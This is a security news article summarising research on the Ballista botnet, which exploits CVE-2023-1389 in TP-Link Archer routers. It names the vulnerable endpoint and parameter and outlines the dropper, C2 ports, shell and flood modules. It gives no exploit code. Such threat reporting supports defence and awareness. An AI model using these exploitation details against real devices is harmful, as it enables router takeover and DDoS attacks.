Pierluigi Paganini
March 12, 2025
Cato CTRL researchers observed a new botnet, called Ballista botnet, which is exploiting a remote code execution (RCE) vulnerability, tracked as CVE-2023-1389 (CVSS score 8.8), in TP-Link Archer routers.
The CVE-2023-1389 flaw is an unauthenticated command injection vulnerability that resides in the locale API of the web management interface of the TP-Link Archer AX21 router. The root cause of the problem is the lack of input sanitization in the locale API that manages the router’s language settings. A remote attacker can trigger the issue to inject commands that should be executed on the device.
The vulnerability was first reported to ZDI during the Pwn2Own Toronto 2022 event. Working exploits for LAN and WAN interface accesses were respectively reported by Team Viettel and Qrious Security.
Since early 2025, Cato CTRL has tracked the Ballista botnet targeting TP-Link Archer routers via CVE-2023-1389. The botnet spreads automatically using a remote code execution (RCE) flaw. TP-Link devices have faced scrutiny, with U.S. agencies considering a ban over security concerns linked to China. The researchers first detected the botnet on January 10, then it evolved by using Tor domains for stealth. The most recent attack attempt occurred on February 17.
“As part of its initial access vector, the Ballista botnet exploits CVE-2023-1389. This vulnerability in the TP-Link Archer router’s web management interface (T1190) stems from the lack of sanitization of user input in the country form of the /cgi-bin/luci;stok=/locale endpoint, resulting in unauthenticated command execution (T1059.004) with root privileges.” reads the Cato report. “The botnet exploits this vulnerability by injecting a payload that downloads and executes a cleartext shell dropper named dropbpb.sh, responsible for downloading the malware binaries and executing them on the compromised device.”
The payload installs a dropper using a bash one-liner that downloads the file from an attacker-controlled server (2.237.57[.]70) via HTTP on port 81. It grants full permissions and executes it as a background process. Once executed, the dropper deletes itself from disk and moves to other directories to download and run the malware. The process includes persistence, system exploration, and anti-detection techniques to maintain control over infected devices.
The malware kills previous instances, deletes itself to evade detection, reads system configuration files, and establishes an encrypted C2 channel on port 82. It spreads by exploiting CVE-2023-1389 and can execute remote shell commands or launch DoS/DDoS attacks when instructed by the C2 server.
The malware’s C2 commands include “shell” for executing bash commands and “flooder” for launching attacks. The shell module enables backdoor access for data exfiltration and persistence. The flooder module, triggered by specific parameters, continuously spawns new threads for attack execution. It processes encrypted data over a RAW socket, limiting further analysis. The malware’s modular design suggests support for multiple flood attack types, though only one has been identified.
Cato links the Ballista botnet to an Italian-based threat actor, the attribution is based on an Italian IP address and strings in Italian in the code. Named after the ancient Roman weapon, Ballista targets TP-Link Archer routers and has affected manufacturing, healthcare, services, and tech sectors in the U.S., Australia, China, and Mexico. A Censys search found over 6,500 vulnerable devices online. The botnet remains active, using advanced C2 protocols, discovery techniques, and DoS capabilities to control infected systems.
“IoT devices have been constantly targeted by threat actors for multiple reasons” concludes the report. “Proactive identification and management of IoT devices within an organization’s network remain essential for mitigating risk and ensuring the resilience of critical infrastructure.”.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Ballista botnet)
